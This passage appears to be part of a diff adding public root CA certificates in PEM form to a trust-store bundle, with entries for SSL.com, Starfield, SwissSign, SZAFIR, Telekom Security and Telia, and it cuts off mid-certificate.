+US4cK38acijnALXRdMbX5J+tB5O2UzU1/Dfkw/ZdFr4hc96SCvigY2q8lpJqPvi8 +ZVWb3vUNiSYE/CUapiVpy8JtynziWV+XrOvvLsi81xtZPCvM8hnIk2snYxnP/Okm ++Mpxm3+T/jRnhE6Z6/yzeAkzcLpmpnbtG3PrGqUNxCITIJRWCk4sbE6x/c+cCbqi +M+2HAgMBAAGjYzBhMB0GA1UdDgQWBBTdBAkHovV6fVJTEpKV7jiAJQ2mWTAPBgNV +HRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFN0ECQei9Xp9UlMSkpXuOIAlDaZZMA4G +A1UdDwEB/wQEAwIBhjANBgkqhkiG9w0BAQsFAAOCAgEAIBgRlCn7Jp0cHh5wYfGV +cpNxJK1ok1iOMq8bs3AD/CUrdIWQPXhq9LmLpZc7tRiRux6n+UBbkflVma8eEdBc +Hadm47GUBwwyOabqG7B52B2ccETjit3E+ZUfijhDPwGFpUenPUayvOUiaPd7nNgs +PgohyC0zrL/FgZkxdMF1ccW+sfAjRfSda/wZY52jvATGGAslu1OJD7OAUN5F7kR/ +q5R4ZJjT9ijdh9hwZXT7DrkT66cPYakylszeu+1jTBi7qUD3oFRuIIhxdRjqerQ0 +cuAjJ3dctpDqhiVAq+8zD8ufgr6iIPv2tS0a5sKFsXQP+8hlAqRSAUfdSSLBv9jr +a6x+3uxjMxW3IwiPxg+NQVrdjsW5j+VFP3jbutIbQLH+cU0/4IGiul607BXgk90I +H37hVZkLId6Tngr75qNJvTYw/ud3sqB1l7UtgYgXZSD32pAAn8lSzDLKNXz1PQ/Y +K9f1JmzJBjSWFupwWRoyeXkLtoh/D1JIPb9s2KJELtFOt3JY04kTlf5Eq/jXixtu +nLwsoFvVagCvXzfh1foQC5ichucmj87w7G6KVwuA406ywKBjYZC6VWg3dGq2ktuf +oYYitmUnDuy2n0Jg5GfCtdpBC8TTi2EbvPofkSvXRAdeuims2cXp71NIWuuA8ShY +Ic2wBlX7Jz9TkHCpBB5XJ7k= +-----END CERTIFICATE----- + +# SSL.com TLS ECC Root CA 2022 +-----BEGIN CERTIFICATE----- +MIICOjCCAcCgAwIBAgIQFAP1q/s3ixdAW+JDsqXRxDAKBggqhkjOPQQDAzBOMQsw +CQYDVQQGEwJVUzEYMBYGA1UECgwPU1NMIENvcnBvcmF0aW9uMSUwIwYDVQQDDBxT +U0wuY29tIFRMUyBFQ0MgUm9vdCBDQSAyMDIyMB4XDTIyMDgyNTE2MzM0OFoXDTQ2 +MDgxOTE2MzM0N1owTjELMAkGA1UEBhMCVVMxGDAWBgNVBAoMD1NTTCBDb3Jwb3Jh +dGlvbjElMCMGA1UEAwwcU1NMLmNvbSBUTFMgRUNDIFJvb3QgQ0EgMjAyMjB2MBAG +ByqGSM49AgEGBSuBBAAiA2IABEUpNXP6wrgjzhR9qLFNoFs27iosU8NgCTWyJGYm +acCzldZdkkAZDsalE3D07xJRKF3nzL35PIXBz5SQySvOkkJYWWf9lCcQZIxPBLFN +SeR7T5v15wj4A4j3p8OSSxlUgaNjMGEwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSME +GDAWgBSJjy+j6CugFFR781a4Jl9nOAuc0DAdBgNVHQ4EFgQUiY8vo+groBRUe/NW +uCZfZzgLnNAwDgYDVR0PAQH/BAQDAgGGMAoGCCqGSM49BAMDA2gAMGUCMFXjIlbp +15IkWE8elDIPDAI2wv2sdDJO4fscgIijzPvX6yv/N33w7deedWo1dlJF4AIxAMeN +b0Igj762TVntd00pxCAgRWSGOlDGxK0tk/UYfXLtqc/ErFc2KAhl3zx5Zn6g6g== +-----END CERTIFICATE----- + +# SSL.com TLS RSA Root CA 2022 +-----BEGIN CERTIFICATE----- +MIIFiTCCA3GgAwIBAgIQb77arXO9CEDii02+1PdbkTANBgkqhkiG9w0BAQsFADBO +MQswCQYDVQQGEwJVUzEYMBYGA1UECgwPU1NMIENvcnBvcmF0aW9uMSUwIwYDVQQD +DBxTU0wuY29tIFRMUyBSU0EgUm9vdCBDQSAyMDIyMB4XDTIyMDgyNTE2MzQyMloX +DTQ2MDgxOTE2MzQyMVowTjELMAkGA1UEBhMCVVMxGDAWBgNVBAoMD1NTTCBDb3Jw +b3JhdGlvbjElMCMGA1UEAwwcU1NMLmNvbSBUTFMgUlNBIFJvb3QgQ0EgMjAyMjCC +AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBANCkCXJPQIgSYT41I57u9nTP +L3tYPc48DRAokC+X94xI2KDYJbFMsBFMF3NQ0CJKY7uB0ylu1bUJPiYYf7ISf5OY +t6/wNr/y7hienDtSxUcZXXTzZGbVXcdotL8bHAajvI9AI7YexoS9UcQbOcGV0ins +S657Lb85/bRi3pZ7QcacoOAGcvvwB5cJOYF0r/c0WRFXCsJbwST0MXMwgsadugL3 +PnxEX4MN8/HdIGkWCVDi1FW24IBydm5MR7d1VVm0U3TZlMZBrViKMWYPHqIbKUBO +L9975hYsLfy/7PO0+r4Y9ptJ1O4Fbtk085zx7AGL0SDGD6C1vBdOSHtRwvzpXGk3 +R2azaPgVKPC506QVzFpPulJwoxJF3ca6TvvC0PeoUidtbnm1jPx7jMEWTO6Af77w +dr5BUxIzrlo4QqvXDz5BjXYHMtWrifZOZ9mxQnUjbvPNQrL8VfVThxc7wDNY8VLS ++YCk8OjwO4s4zKTGkH8PnP2L0aPP2oOnaclQNtVcBdIKQXTbYxE3waWglksejBYS +d66UNHsef8JmAOSqg+qKkK3ONkRN0VHpvB/zagX9wHQfJRlAUW7qglFA35u5CCoG +AtUjHBPW6dvbxrB6y3snm/vg1UYk7RBLY0ulBY+6uB0rpvqR4pJSvezrZ5dtmi2f +gTIFZzL7SAg/2SW4BCUvAgMBAAGjYzBhMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0j +BBgwFoAU+y437uOEeicuzRk1sTN8/9REQrkwHQYDVR0OBBYEFPsuN+7jhHonLs0Z +NbEzfP/UREK5MA4GA1UdDwEB/wQEAwIBhjANBgkqhkiG9w0BAQsFAAOCAgEAjYlt +hEUY8U+zoO9opMAdrDC8Z2awms22qyIZZtM7QbUQnRC6cm4pJCAcAZli05bg4vsM +QtfhWsSWTVTNj8pDU/0quOr4ZcoBwq1gaAafORpR2eCNJvkLTqVTJXojpBzOCBvf +R4iyrT7gJ4eLSYwfqUdYe5byiB0YrrPRpgqU+tvT5TgKa3kSM/tKWTcWQA673vWJ +DPFs0/dRa1419dvAJuoSc06pkZCmF8NsLzjUo3KUQyxi4U5cMj29TH0ZR6LDSeeW +P4+a0zvkEdiLA9z2tmBVGKaBUfPhqBVq6+AL8BQx1rmMRTqoENjwuSfr98t67wVy +lrXEj5ZzxOhWc5y8aVFjvO9nHEMaX3cZHxj4HCUp+UmZKbaSPaKDN7EgkaibMOlq +bLQjk2UEqxHzDh1TJElTHaE/nUiSEeJ9DU/1172iWD54nR4fK/4huxoTtrEoZP2w +AgDHbICivRZQIA9ygV/MlP+7mea6kMvq+cYMwq7FGc4zoWtcu358NFcXrfA/rs3q +r5nsLFR+jM4uElZI7xc7P0peYNLcdDa8pUNjyw9bowJWCZ4kLOGGgYz+qxcs+sji +Mho6/4UIyYOf8kpIEFR3N+2ivEC+5BB09+Rbu7nzifmPQdjH5FCQNYA+HLhNkNPU +98OwoX6EyneSMSy4kLGCenROmxMmtNVQZlR4rmA= +-----END CERTIFICATE----- + +# Starfield Class 2 CA +-----BEGIN CERTIFICATE----- +MIIEDzCCAvegAwIBAgIBADANBgkqhkiG9w0BAQUFADBoMQswCQYDVQQGEwJVUzEl +MCMGA1UEChMcU3RhcmZpZWxkIFRlY2hub2xvZ2llcywgSW5jLjEyMDAGA1UECxMp +U3RhcmZpZWxkIENsYXNzIDIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDQw +NjI5MTczOTE2WhcNMzQwNjI5MTczOTE2WjBoMQswCQYDVQQGEwJVUzElMCMGA1UE +ChMcU3RhcmZpZWxkIFRlY2hub2xvZ2llcywgSW5jLjEyMDAGA1UECxMpU3RhcmZp +ZWxkIENsYXNzIDIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwggEgMA0GCSqGSIb3 +DQEBAQUAA4IBDQAwggEIAoIBAQC3Msj+6XGmBIWtDBFk385N78gDGIc/oav7PKaf +8MOh2tTYbitTkPskpD6E8J7oX+zlJ0T1KKY/e97gKvDIr1MvnsoFAZMej2YcOadN ++lq2cwQlZut3f+dZxkqZJRRU6ybH838Z1TBwj6+wRir/resp7defqgSHo9T5iaU0 +X9tDkYI22WY8sbi5gv2cOj4QyDvvBmVmepsZGD3/cVE8MC5fvj13c7JdBmzDI1aa +K4UmkhynArPkPw2vCHmCuDY96pzTNbO8acr1zJ3o/WSNF4Azbl5KXZnJHoe0nRrA +1W4TNSNe35tfPe/W93bC6j67eA0cQmdrBNj41tpvi/JEoAGrAgEDo4HFMIHCMB0G +A1UdDgQWBBS/X7fRzt0fhvRbVazc1xDCDqmI5zCBkgYDVR0jBIGKMIGHgBS/X7fR +zt0fhvRbVazc1xDCDqmI56FspGowaDELMAkGA1UEBhMCVVMxJTAjBgNVBAoTHFN0 +YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xMjAwBgNVBAsTKVN0YXJmaWVsZCBD +bGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8w +DQYJKoZIhvcNAQEFBQADggEBAAWdP4id0ckaVaGsafPzWdqbAYcaT1epoXkJKtv3 +L7IezMdeatiDh6GX70k1PncGQVhiv45YuApnP+yz3SFmH8lU+nLMPUxA2IGvd56D +eruix/U0F47ZEUD0/CwqTRV/p2JdLiXTAAsgGh1o+Re49L2L7ShZ3U0WixeDyLJl +xy16paq8U4Zt3VekyvggQQto8PT7dL5WXXp59fkdheMtlb71cZBDzI0fmgAKhynp +VSJYACPq4xJDKVtHCN2MQWplBqjlIapBtJUhlbl90TSrE9atvNziPTnNvT51cKEY +WQPJIrSPnNVeKtelttQKbfi3QBFGmh95DmK/D5fs4C8fF5Q= +-----END CERTIFICATE----- + +# Starfield Root Certificate Authority - G2 +-----BEGIN CERTIFICATE----- +MIID3TCCAsWgAwIBAgIBADANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxJTAjBgNVBAoT +HFN0YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xMjAwBgNVBAMTKVN0YXJmaWVs +ZCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5MDkwMTAwMDAw +MFoXDTM3MTIzMTIzNTk1OVowgY8xCzAJBgNVBAYTAlVTMRAwDgYDVQQIEwdBcml6 +b25hMRMwEQYDVQQHEwpTY290dHNkYWxlMSUwIwYDVQQKExxTdGFyZmllbGQgVGVj +aG5vbG9naWVzLCBJbmMuMTIwMAYDVQQDEylTdGFyZmllbGQgUm9vdCBDZXJ0aWZp +Y2F0ZSBBdXRob3JpdHkgLSBHMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC +ggEBAL3twQP89o/8ArFvW59I2Z154qK3A2FWGMNHttfKPTUuiUP3oWmb3ooa/RMg +nLRJdzIpVv257IzdIvpy3Cdhl+72WoTsbhm5iSzchFvVdPtrX8WJpRBSiUZV9Lh1 +HOZ/5FSuS/hVclcCGfgXcVnrHigHdMWdSL5stPSksPNkN3mSwOxGXn/hbVNMYq/N +Hwtjuzqd+/x5AJhhdM8mgkBj87JyahkNmcrUDnXMN/uLicFZ8WJ/X7NfZTD4p7dN +dloedl40wOiWVpmKs/B/pM293DIxfJHP4F8R+GuqSVzRmZTRouNjWwl2tVZi4Ut0 +HZbUJtQIBFnQmA4O5t78w+wfkPECAwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAO +BgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFHwMMh+n2TB/xH1oo2Kooc6rB1snMA0G +CSqGSIb3DQEBCwUAA4IBAQARWfolTwNvlJk7mh+ChTnUdgWUXuEok21iXQnCoKjU +sHU48TRqneSfioYmUeYs0cYtbpUgSpIB7LiKZ3sx4mcujJUDJi5DnUox9g61DLu3 +4jd/IroAow57UvtruzvE03lRTs2Q9GcHGcg8RnoNAX3FWOdt5oUwF5okxBDgBPfg +8n/Uqgr/Qh037ZTlZFkSIHc40zI+OIF1lnP6aI+xy84fxez6nH7PfrHxBy22/L/K +pL/QlwVKvOoYKAKQvVR4CSFx09F9HdkWsKlhPdAKACL8x3vLCWRFCztAgfd9fDL1 +mMpYjn0q7pBZc2T5NnReJaH1ZgUufzkVqSr7UIuOhWn0 +-----END CERTIFICATE----- + +# Starfield Services Root Certificate Authority - G2 +-----BEGIN CERTIFICATE----- +MIID7zCCAtegAwIBAgIBADANBgkqhkiG9w0BAQsFADCBmDELMAkGA1UEBhMCVVMx +EDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxJTAjBgNVBAoT +HFN0YXJmaWVsZCBUZWNobm9sb2dpZXMsIEluYy4xOzA5BgNVBAMTMlN0YXJmaWVs +ZCBTZXJ2aWNlcyBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAtIEcyMB4XDTA5 +MDkwMTAwMDAwMFoXDTM3MTIzMTIzNTk1OVowgZgxCzAJBgNVBAYTAlVTMRAwDgYD +VQQIEwdBcml6b25hMRMwEQYDVQQHEwpTY290dHNkYWxlMSUwIwYDVQQKExxTdGFy +ZmllbGQgVGVjaG5vbG9naWVzLCBJbmMuMTswOQYDVQQDEzJTdGFyZmllbGQgU2Vy +dmljZXMgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgLSBHMjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBANUMOsQq+U7i9b4Zl1+OiFOxHz/Lz58gE20p +OsgPfTz3a3Y4Y9k2YKibXlwAgLIvWX/2h/klQ4bnaRtSmpDhcePYLQ1Ob/bISdm2 +8xpWriu2dBTrz/sm4xq6HZYuajtYlIlHVv8loJNwU4PahHQUw2eeBGg6345AWh1K +Ts9DkTvnVtYAcMtS7nt9rjrnvDH5RfbCYM8TWQIrgMw0R9+53pBlbQLPLJGmpufe +hRhJfGZOozptqbXuNC66DQO4M99H67FrjSXZm86B0UVGMpZwh94CDklDhbZsc7tk +6mFBrMnUVN+HL8cisibMn1lUaJ/8viovxFUcdUBgF4UCVTmLfwUCAwEAAaNCMEAw +DwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFJxfAN+q +AdcwKziIorhtSpzyEZGDMA0GCSqGSIb3DQEBCwUAA4IBAQBLNqaEd2ndOxmfZyMI +bw5hyf2E3F/YNoHN2BtBLZ9g3ccaaNnRbobhiCPPE95Dz+I0swSdHynVv/heyNXB +ve6SbzJ08pGCL72CQnqtKrcgfU28elUSwhXqvfdqlS5sdJ/PHLTyxQGjhdByPq1z +qwubdQxtRbeOlKyWN7Wg0I8VRw7j6IPdj/3vQQF3zCepYoUz8jcI73HPdwbeyBkd +iEDPfUYd/x7H4c7/I9vG+o1VTqkC50cRRj70/b17KSa7qWFiNyi2LSr2EIZkyXCn +0q23KXB56jzaYyWf/Wi3MOxw+3WKt21gZ7IeyLnp2KhvAotnDU0mV3HaIPzBSlCN +sSi6 +-----END CERTIFICATE----- + +# SwissSign Gold CA - G2 +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# SZAFIR ROOT CA2 +-----BEGIN CERTIFICATE----- +MIIDcjCCAlqgAwIBAgIUPopdB+xV0jLVt+O2XwHrLdzk1uQwDQYJKoZIhvcNAQEL +BQAwUTELMAkGA1UEBhMCUEwxKDAmBgNVBAoMH0tyYWpvd2EgSXpiYSBSb3psaWN6 +ZW5pb3dhIFMuQS4xGDAWBgNVBAMMD1NaQUZJUiBST09UIENBMjAeFw0xNTEwMTkw +NzQzMzBaFw0zNTEwMTkwNzQzMzBaMFExCzAJBgNVBAYTAlBMMSgwJgYDVQQKDB9L +cmFqb3dhIEl6YmEgUm96bGljemVuaW93YSBTLkEuMRgwFgYDVQQDDA9TWkFGSVIg +Uk9PVCBDQTIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC3vD5QqEvN +QLXOYeeWyrSh2gwisPq1e3YAd4wLz32ohswmUeQgPYUM1ljj5/QqGJ3a0a4m7utT +3PSQ1hNKDJA8w/Ta0o4NkjrcsbH/ON7Dui1fgLkCvUqdGw+0w8LBZwPd3BucPbOw +3gAeqDRHu5rr/gsUvTaE2g0gv/pby6kWIK05YO4vdbbnl5z5Pv1+TW9NL++IDWr6 +3fE9biCloBK0TXC5ztdyO4mTp4CEHCdJckm1/zuVnsHMyAHs6A6KCpbns6aH5db5 +BSsNl0BwPLqsdVqc1U2dAgrSS5tmS0YHF2Wtn2yIANwiieDhZNRnvDF5YTy7ykHN +XGoAyDw4jlivAgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQD +AgEGMB0GA1UdDgQWBBQuFqlKGLXLzPVvUPMjX/hd56zwyDANBgkqhkiG9w0BAQsF +AAOCAQEAtXP4A9xZWx126aMqe5Aosk3AM0+qmrHUuOQn/6mWmc5G4G18TKI4pAZw +8PRBEew/R40/cof5O/2kbytTAOD/OblqBw7rHRz2onKQy4I9EYKL0rufKq8h5mOG +nXkZ7/e7DDWQw4rtTw/1zBLZpD67oPwglV9PJi8RI4NOdQcPv5vRtB3pEAT+ymCP +oky4rc/hkA/NrgrHXXu3UNLUYfrVFdvXn4dRVOul4+vJhaAlIDf7js4MNIThPIGy +d05DpYhfhmehPea0XGG2Ptv+tyjFogeutcrKjSoS75ftwjCkySp6+/NNIxuZMzSg +LvWpCz/UXeHPhJ/iGcJfitYgHuNztw== +-----END CERTIFICATE----- + +# Telekom Security TLS ECC Root 2020 +-----BEGIN CERTIFICATE----- +MIICQjCCAcmgAwIBAgIQNjqWjMlcsljN0AFdxeVXADAKBggqhkjOPQQDAzBjMQsw +CQYDVQQGEwJERTEnMCUGA1UECgweRGV1dHNjaGUgVGVsZWtvbSBTZWN1cml0eSBH +bWJIMSswKQYDVQQDDCJUZWxla29tIFNlY3VyaXR5IFRMUyBFQ0MgUm9vdCAyMDIw +MB4XDTIwMDgyNTA3NDgyMFoXDTQ1MDgyNTIzNTk1OVowYzELMAkGA1UEBhMCREUx +JzAlBgNVBAoMHkRldXRzY2hlIFRlbGVrb20gU2VjdXJpdHkgR21iSDErMCkGA1UE +AwwiVGVsZWtvbSBTZWN1cml0eSBUTFMgRUNDIFJvb3QgMjAyMDB2MBAGByqGSM49 +AgEGBSuBBAAiA2IABM6//leov9Wq9xCazbzREaK9Z0LMkOsVGJDZos0MKiXrPk/O +tdKPD/M12kOLAoC+b1EkHQ9rK8qfwm9QMuU3ILYg/4gND21Ju9sGpIeQkpT0CdDP +f8iAC8GXs7s1J8nCG6NCMEAwHQYDVR0OBBYEFONyzG6VmUex5rNhTNHLq+O6zd6f +MA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMAoGCCqGSM49BAMDA2cA +MGQCMHVSi7ekEE+uShCLsoRbQuHmKjYC2qBuGT8lv9pZMo7k+5Dck2TOrbRBR2Di +z6fLHgIwN0GMZt9Ba9aDAEH9L1r3ULRn0SyocddDypwnJJGDSA3PzfdUga/sf+Rn +27iQ7t0l +-----END CERTIFICATE----- + +# Telekom Security TLS RSA Root 2023 +-----BEGIN CERTIFICATE----- +MIIFszCCA5ugAwIBAgIQIZxULej27HF3+k7ow3BXlzANBgkqhkiG9w0BAQwFADBj +MQswCQYDVQQGEwJERTEnMCUGA1UECgweRGV1dHNjaGUgVGVsZWtvbSBTZWN1cml0 +eSBHbWJIMSswKQYDVQQDDCJUZWxla29tIFNlY3VyaXR5IFRMUyBSU0EgUm9vdCAy +MDIzMB4XDTIzMDMyODEyMTY0NVoXDTQ4MDMyNzIzNTk1OVowYzELMAkGA1UEBhMC +REUxJzAlBgNVBAoMHkRldXRzY2hlIFRlbGVrb20gU2VjdXJpdHkgR21iSDErMCkG +A1UEAwwiVGVsZWtvbSBTZWN1cml0eSBUTFMgUlNBIFJvb3QgMjAyMzCCAiIwDQYJ +KoZIhvcNAQEBBQADggIPADCCAgoCggIBAO01oYGA88tKaVvC+1GDrib94W7zgRJ9 +cUD/h3VCKSHtgVIs3xLBGYSJwb3FKNXVS2xE1kzbB5ZKVXrKNoIENqil/Cf2SfHV +cp6R+SPWcHu79ZvB7JPPGeplfohwoHP89v+1VmLhc2o0mD6CuKyVU/QBoCcHcqMA +U6DksquDOFczJZSfvkgdmOGjup5czQRxUX11eKvzWarE4GC+j4NSuHUaQTXtvPM6 +Y+mpFEXX5lLRbtLevOP1Czvm4MS9Q2QTps70mDdsipWol8hHD/BeEIvnHRz+sTug +BTNoBUGCwQMrAcjnj02r6LX2zWtEtefdi+zqJbQAIldNsLGyMcEWzv/9FIS3R/qy +8XDe24tsNlikfLMR0cN3f1+2JeANxdKz+bi4d9s3cXFH42AYTyS2dTd4uaNir73J +co4vzLuu2+QVUhkHM/tqty1LkCiCc/4YizWN26cEar7qwU02OxY2kTLvtkCJkUPg +8qKrBC7m8kwOFjQgrIfBLX7JZkcXFBGk8/ehJImr2BrIoVyxo/eMbcgByU/J7MT8 +rFEz0ciD0cmfHdRHNCk+y7AO+oMLKFjlKdw/fKifybYKu6boRhYPluV75Gp6SG12 +mAWl3G0eQh5C2hrgUve1g8Aae3g1LDj1H/1Joy7SWWO/gLCMk3PLNaaZlSJhZQNg ++y+TS/qanIA7AgMBAAGjYzBhMA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUtqeX +gj10hZv3PJ+TmpV5dVKMbUcwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBS2 +p5eCPXSFm/c8n5OalXl1UoxtRzANBgkqhkiG9w0BAQwFAAOCAgEAqMxhpr51nhVQ +pGv7qHBFfLp+sVr8WyP6Cnf4mHGCDG3gXkaqk/QeoMPhk9tLrbKmXauw1GLLXrtm +9S3ul0A8Yute1hTWjOKWi0FpkzXmuZlrYrShF2Y0pmtjxrlO8iLpWA1WQdH6DErw +M807u20hOq6OcrXDSvvpfeWxm4bu4uB9tPcy/SKE8YXJN3nptT+/XOR0so8RYgDd +GGah2XsjX/GO1WfoVNpbOms2b/mBsTNHM3dA+VKq3dSDz4V4mZqTuXNnQkYRIer+ +CqkbGmVps4+uFrb2S1ayLfmlyOw7YqPta9BO1UAJpB+Y1zqlklkg5LB9zVtzaL1t +xKITDmcZuI1CfmwMmm6gJC3VRRvcxAIU/oVbZZfKTpBQCHpCNfnqwmbU+AGuHrS+ +w6jv/naaoqYfRvaE7fzbzsQCzndILIyy7MMAo+wsVRjBfhnu4S/yrYObnqsZ38aK +L4x35bcF7DvB7L6Gs4a8wPfc5+pbrrLMtTWGS9DiP7bY+A4A7l3j941Y/8+LN+lj +X273CXE2whJdV/LItM3z7gLfEdxquVeEHVlNjM7IDiPCtyaaEBRx/pOyiriA8A4Q +ntOoUAw3gi/q4Iqd4Sw5/7W0cwDk90imc6y/st53BIe0o82bNSQ3+pCTE4FCxpgm +dTdmQRCsu/WU48IxK63nI1bMNSWSs1A= +-----END CERTIFICATE----- + +# Telia Root CA v2 +-----BEGIN CERTIFICATE----- +MIIFdDCCA1ygAwIBAgIPAWdfJ9b+euPkrL4JWwWeMA0GCSqGSIb3DQEBCwUAMEQx +CzAJBgNVBAYTAkZJMRowGAYDVQQKDBFUZWxpYSBGaW5sYW5kIE95ajEZMBcGA1UE +AwwQVGVsaWEgUm9vdCBDQSB2MjAeFw0xODExMjkxMTU1NTRaFw00MzExMjkxMTU1 +NTRaMEQxCzAJBgNVBAYTAkZJMRowGAYDVQQKDBFUZWxpYSBGaW5sYW5kIE95ajEZ +MBcGA1UEAwwQVGVsaWEgUm9vdCBDQSB2MjCCAiIwDQYJKoZIhvcNAQEBBQADggIP +ADCCAgoCggIBALLQPwe84nvQa5n44ndp586dpAO8gm2h/oFlH0wnrI4AuhZ76zBq +AMCzdGh+sq/H1WKzej9Qyow2RCRj0jbpDIX2Q3bVTKFgcmfiKDOlyzG4OiIjNLh9 +vVYiQJ3q9HsDrWj8soFPmNB06o3lfc1jw6P23pLCWBnglrvFxKk9pXSW/q/5iaq9 +lRdU2HhE8Qx3FZLgmEKnpNaqIJLNwaCzlrI6hEKNfdWV5Nbb6WLEWLN5xYzTNTOD +n3WhUidhOPFZPY5Q4L15POdslv5e2QJltI5c0BE0312/UqeBAMN/mUWZFdUXyApT +7GPzmX3MaRKGwhfwAZ6/hLzRUssbkmbOpFPlob/E2wnW5olWK8jjfN7j/4nlNW4o +6GwLI1GpJQXrSPjdscr6bAhR77cYbETKJuFzxokGgeWKrLDiKca5JLNrRBH0pUPC +TEPlcDaMtjNXepUugqD0XBCzYYP2AgWGLnwtbNwDRm41k9V6lS/eINhbfpSQBGq6 +WT0EBXWdN6IOLj3rwaRSg/7Qa9RmjtzG6RJOHSpXqhC8fF6CfaamyfItufUXJ63R +DolUK5X6wK0dmBR4M0KGCqlztft0DbcbMBnEWg4cJ7faGND/isgFuvGqHKI3t+ZI +pEYslOqodmJHixBTB0hXbOKSTbauBcvcwUpej6w9GU7C7WB1K9vBykLVAgMBAAGj +YzBhMB8GA1UdIwQYMBaAFHKs5DN5qkWH9v2sHZ7Wxy+G2CQ5MB0GA1UdDgQWBBRy +rOQzeapFh/b9rB2e1scvhtgkOTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUw +AwEB/zANBgkqhkiG9w0BAQsFAAOCAgEAoDtZpwmUPjaE0n4vOaWWl/oRrfxn83EJ 